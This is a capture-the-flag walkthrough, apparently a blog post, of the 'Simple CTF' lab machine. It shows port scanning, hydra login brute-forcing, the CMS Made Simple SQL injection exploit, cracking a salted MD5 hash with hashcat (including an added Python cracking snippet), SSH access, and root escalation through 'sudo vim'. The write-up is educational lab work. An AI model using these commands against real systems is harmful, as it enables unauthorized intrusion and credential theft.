Simple CTF

Surya Dev Singh
11 min read · Nov 13, 2021

Beginner-level CTF

✔️ INFORMATION GATHERING

rustscan :

┌──(root💀kali)-[~]
└─# rustscan -a 10.10.74.102 --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.74.102:80
Open 10.10.74.102:2222
Open 10.10.74.102:21
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 00:54 EST
Initiating Ping Scan at 00:54
Scanning 10.10.74.102 [4 ports]
Completed Ping Scan at 00:54, 0.50s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 00:54
Completed Parallel DNS resolution of 1 host. at 00:54, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 00:54
Scanning 10.10.74.102 [3 ports]
Discovered open port 2222/tcp on 10.10.74.102
Discovered open port 80/tcp on 10.10.74.102
Completed SYN Stealth Scan at 00:54, 7.64s elapsed (3 total ports)
Nmap scan report for 10.10.74.102
Host is up, received echo-reply ttl 61 (0.45s latency).
Scanned at 2021-11-10 00:54:15 EST for 8s
PORT STATE SERVICE REASON
21/tcp filtered ftp no-response
80/tcp open http syn-ack ttl 61
2222/tcp open EtherNetIP-1 syn-ack ttl 61
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds
Raw packets sent: 11 (460B) | Rcvd: 3 (116B)

Open ports:

  • 21 : FTP
  • 80: HTTP
  • 2222: EtherNetIp-1

nmap :

┌──(root💀kali)-[~]
└─# nmap 10.10.74.102 -sV -p80,21,2222
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-10 01:48 EST
Nmap scan report for 10.10.74.102
Host is up (0.39s latency).

PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.82 seconds

OK, port 2222 is SSH. We will rely on the nmap result.

Let's visit port 80.

port 80

web server at port 80

Let's view the source code.

source code

Nothing interesting at first. Let's check the other services, but before that let's start directory busting in the background.

┌──(root💀kali)-[~]
└─# gobuster dir -u 10.10.74.102 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.74.102
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/10 01:24:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/index.html (Status: 200) [Size: 11321]
/robots.txt (Status: 200) [Size: 929]
/server-status (Status: 403) [Size: 300]
/simple (Status: 301) [Size: 313] [--> http://10.10.74.102/simple/]

===============================================================
2021/11/10 01:25:13 Finished
===============================================================

OK, let's visit the /simple directory:

/simple
CMS (CMS Made Simple) framework version number

OK, it looks like the site is built with the CMS Made Simple framework, version 2.2.8.

Let's do a quick lookup in searchsploit.

┌──(root💀kali)-[~]
└─# searchsploit "cms made simple 2.2.8"
----------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------- ---------------------------------
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
----------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

OK, there might be an SQL injection exploit for CMS Made Simple; this could be the right exploit. Let's check whether there is a CVE for it.

But before moving on to that, let's first enumerate the other services as well.

Let's go to FTP and see if we can log in to it.

┌──(root💀kali)-[~]
└─# ftp 10.10.74.102
Connected to 10.10.74.102.
220 (vsFTPd 3.0.3)
Name (10.10.74.102:root):
530 This FTP server is anonymous only.
Login failed.
ftp>

The error message reveals that we can log in to FTP as the anonymous user, so let's log in as anonymous.

┌──(root💀kali)-[~]
└─# ftp 10.10.74.102
Connected to 10.10.74.102.
220 (vsFTPd 3.0.3)
Name (10.10.74.102:root): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Aug 17 2019 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 166 Aug 17 2019 ForMitch.txt
226 Directory send OK.
ftp> get ForMitch.txt
local: ForMitch.txt remote: ForMitch.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for ForMitch.txt (166 bytes).
226 Transfer complete.
166 bytes received in 0.80 secs (0.2035 kB/s)
ftp>

And we were able to log in as anonymous and found a file called ForMitch.txt.

Let's open that file.

Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!
ForMitch.txt (END)

From the message it seems we have one developer account, called Mitch, whose password is very weak.

OK, we have not yet visited some of the directories from our enumeration results, so let's first go to robots.txt.

robots.txt

OK, we have got the right user name, i.e. mike, and we have also found one more directory, /openemr-5_0_1_3.

Let's visit that.

It seems we didn't find anything. I think we need to run gobuster again on the /simple directory.

┌──(root💀kali)-[~]
└─# gobuster dir -u 10.10.74.102/simple -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 60
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.74.102/simple
[+] Method: GET
[+] Threads: 60
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/11/10 02:00:47 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 298]
/.htaccess (Status: 403) [Size: 303]
/.htpasswd (Status: 403) [Size: 303]
/admin (Status: 301) [Size: 319] [--> http://10.10.74.102/simple/admin/]
/assets (Status: 301) [Size: 320] [--> http://10.10.74.102/simple/assets/]
/doc (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/doc/]
/index.php (Status: 200) [Size: 19913]
/lib (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/lib/]
/modules (Status: 301) [Size: 321] [--> http://10.10.74.102/simple/modules/]
/tmp (Status: 301) [Size: 317] [--> http://10.10.74.102/simple/tmp/]
/uploads (Status: 301) [Size: 321] [--> http://10.10.74.102/simple/uploads/]

===============================================================
2021/11/10 02:01:34 Finished
===============================================================

And there we are, we have got some directories. I would be more interested in visiting /admin first.

cms admin

It's a login portal, and we have the user name mike.

From our last enumeration we found that mike's password is easy, so let's brute-force it.

capturing the request
┌──(root💀kali)-[~]
└─# hydra -l mitch -P /usr/share/wordlists/rockyou.txt 10.10.190.16 http-post-form "/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect" -t 50
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-10 17:47:30
[DATA] max 50 tasks per 1 server, overall 50 tasks, 14344399 login tries (l:1/p:14344399), ~286888 tries per task
[DATA] attacking http-post-form://10.10.190.16:80/simple/admin/login.php:username=^USER^&password=^PASS^&loginsubmit=Submit:User name or password incorrect
[80][http-post-form] host: 10.10.190.16 login: mitch password: secret
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-10 17:47:40

Well, we got a username and password for the login portal, but from the machine's perspective we need to find an existing CVE and exploit that.

Let's see if we can exploit the login page with the SQL injection we found via searchsploit; we can also look it up on the internet.

Let's copy the exploit to our home directory.

┌──(root💀kali)-[~]
└─# searchsploit -m php/webapps/46635.py
Exploit: CMS Made Simple < 2.2.10 - SQL Injection
URL: https://www.exploit-db.com/exploits/46635
Path: /usr/share/exploitdb/exploits/php/webapps/46635.py
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/46635.py

✔️ EXPLOITATION

I will rename it to cms-sql-exploit.py and now run our exploit.

┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py
File "/root/cms-sql-exploit.py", line 25
print "[+] Specify an url target"
^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[+] Specify an url target")?

OK, it seems the program is written in Python 2. We have Python 2 on our Kali, but there would be module problems when we try to run the program (Python 2 is dead). We will use 2to3 to convert the program so it runs under Python 3.

2to3 -w cms-sql-exploit.py
  • -w writes the converted source back to the file.

Now we can run cms-sql-exploit.py.

┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py
[+] Specify an url target
[+] Example usage (no cracking password): exploit.py -u http://target-uri
[+] Example usage (with cracking password): exploit.py -u http://target-uri --crack -w /path-wordlist
[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.
┌──(root💀kali)-[~]
└─# python3 cms-sql-exploit.py -u http://10.10.104.126/simple --crack -w /usr/share/wordlists/rockyou.txt

Result I got:

[+] Salt for password found: 1dajXcz
[+] Username found: ji
[+] Email found: adv
[+] Password found: 0c01sf
[*] Try: 000000

I got a false-positive result.
I re-ran the program, but this time increased the TIME variable to 4, because the exploit uses time-based SQL injection: if we increase the time, a request that gets no response within 4 seconds indicates an injection vector.

[+] Salt for password found: 1dac0d92e9fa6bb2
[+] Username found: mitch
[+] Email found: admin@admin.com
[*] Try: 0c01f4468bd75d7a84c7eb73846e8d96$
[*] Now try to crack password
Traceback (most recent call last):
File "/root/cms-sql-exploit.py", line 184, in <module>
crack_password()
File "/root/cms-sql-exploit.py", line 53, in crack_password
for line in dict.readlines():
File "/usr/lib/python3.9/codecs.py", line 322, in decode
(result, consumed) = self._buffer_decode(data, self.errors, final)
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xf1 in position 933: invalid continuation byte

It seems we got an error. We could fix it, but instead of doing that: we have already found a valid hash, and the error is related to encoding.
Looking at the hash, the first guess is MD5.

Let's try to analyze the hash:

┌──(root💀kali)-[~]
└─# hashid
0c01f4468bd75d7a84c7eb73846e8d96
Analyzing '0c01f4468bd75d7a84c7eb73846e8d96'
[+] MD2
[+] MD5
[+] MD4
[+] Double MD5
[+] LM
[+] RIPEMD-128
[+] Haval-128
[+] Tiger-128
[+] Skein-256(128)
[+] Skein-512(128)
[+] Lotus Notes/Domino 5
[+] Skype
[+] Snefru-128
[+] NTLM
[+] Domain Cached Credentials
[+] Domain Cached Credentials 2
[+] DNSSEC(NSEC3)
[+] RAdmin v2.x

hash-identifier

┌──(root💀kali)-[~]
└─# hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: 0c01f4468bd75d7a84c7eb73846e8d96

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

We have an MD5 hash and we also have the salt.

A password salt is a random bit of data added to the password before it's run through the hashing algorithm.

We can look for a mode in hashcat that can crack MD5 hashes with salts.

C:\Users\szero\Desktop\hashcat-6.2.4>hashcat.exe --help | findstr md5
70 | md5(utf16le($pass)) | Raw Hash
10 | md5($pass.$salt) | Raw Hash, Salted and/or Iterated
20 | md5($salt.$pass) | Raw Hash, Salted and/or Iterated
hashcat example

So I tried the command:

hashcat64.exe -m 10 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 rockyou.txt

but it didn't work :{
so I tried changing it:

hashcat64.exe -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 rockyou.txt

This time it worked!!

0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret
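As an added example (not part of the original write-up or of the exploit script), the two hashcat modes above differ only in whether the salt is prepended or appended to the password; the Python below mirrors that check on a constructed wordlist that also carries a non-UTF-8 byte, which is what raised the UnicodeDecodeError in the converted exploit. The salt is the one from the write-up; the wordlist bytes and the helper names are assumptions.

```python
import hashlib

# Constructed sample data (not a real dump): the salt mirrors the one the
# exploit printed; the fake wordlist contains a 0xf1 byte, as rockyou.txt does,
# which is invalid UTF-8 and breaks a plain open(wordlist).readlines().
SALT = "1dac0d92e9fa6bb2"
WORDLIST_BYTES = b"123456\npassword\n\xf1andu\nsecret\nletmein\n"


def md5_hex(text: str) -> str:
    # latin-1 round-trips every byte value, so words read from the wordlist
    # are hashed exactly as they were stored.
    return hashlib.md5(text.encode("latin-1")).hexdigest()


def candidate_hash(word: str, salt: str, mode: int) -> str:
    """hashcat -m 10 is md5($pass.$salt); -m 20 is md5($salt.$pass)."""
    if mode == 10:
        return md5_hex(word + salt)
    if mode == 20:
        return md5_hex(salt + word)
    raise ValueError("mode must be 10 or 20")


def crack(target_hash: str, salt: str, wordlist: bytes, mode: int):
    """Return the first word whose salted MD5 matches, or None."""
    # Decoding as latin-1 instead of UTF-8 is the fix for the traceback shown
    # above: every byte maps to one character, so no line can fail to decode.
    for raw in wordlist.splitlines():
        word = raw.decode("latin-1").rstrip("\r")
        if candidate_hash(word, salt, mode) == target_hash.lower():
            return word
    return None


def detect_mode(target_hash: str, salt: str, wordlist: bytes):
    """Try -m 10 then -m 20, mirroring the two hashcat attempts in the text."""
    for mode in (10, 20):
        word = crack(target_hash, salt, wordlist, mode)
        if word is not None:
            return mode, word
    return None, None


if __name__ == "__main__":
    # Hash from the write-up; the salt-first construction (mode 20) matched.
    print(detect_mode("0c01f4468bd75d7a84c7eb73846e8d96", SALT, WORDLIST_BYTES))
```

Because unsalted-style fast MD5 is the only work factor here, a short wordlist is enough to recover the password; a slow, memory-hard KDF such as bcrypt or Argon2 is what would make this check expensive.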

So, from the file we found on the FTP server, it says that Mitch uses the same password for the system user, and we have already found that the SSH port is open (remember, port 2222). So we will try to log in with these credentials.

mitch:secret

┌──(root💀kali)-[~]
└─# ssh mitch@10.10.24.159 -p 2222
The authenticity of host '[10.10.24.159]:2222 ([10.10.24.159]:2222)' can't be established.
ECDSA key fingerprint is SHA256:Fce5J4GBLgx1+iaSMBjO+NFKOjZvL5LOVF5/jc0kwt8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.24.159]:2222' (ECDSA) to the list of known hosts.
mitch@10.10.24.159's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic i686)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190
$ ls
user.txt
$ cat user.txt
G00d j0b, keep up!
$ ls
user.txt
$ cd ..
$ ls
mitch sunbath

✔️ PRIVILEGE ESCALATION

Manual enumeration:

-sh: 8: cd: can't cd to sunbath

Finding SUID binaries owned by root:

$ find / -type f -user root -perm /4000 2>/dev/null
/bin/su
/bin/ping
/bin/mount
/bin/umount
/bin/ping6
/bin/fusermount
/usr/bin/passwd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/snapd/snap-confine
/usr/lib/i386-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/sbin/pppd
$

Commands we can run with sudo:

$ sudo -l
User mitch may run the following commands on Machine:
(root) NOPASSWD: /usr/bin/vim

OK, it seems we can run vim as sudo, so we can use this exploit:

sudo vim -c ':!/bin/sh'

Source: GTFOBins

$ sudo vim -c ":!/bin/bash"
root@Machine:/home#

And we got root. The privesc part of this machine was easy!!

root@Machine:/# cd root/
root@Machine:/root# cat root.txt
*********************
root@Machine:/root#

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -

You guys can subscribe to me 🙌 on YouTube: I post walkthroughs and other ethical hacking related videos there.


Surya Dev Singh

Enthusiastic cyber security learner and penetration tester / ethical hacker, Python programmer; in my free time you will find me solving CTFs.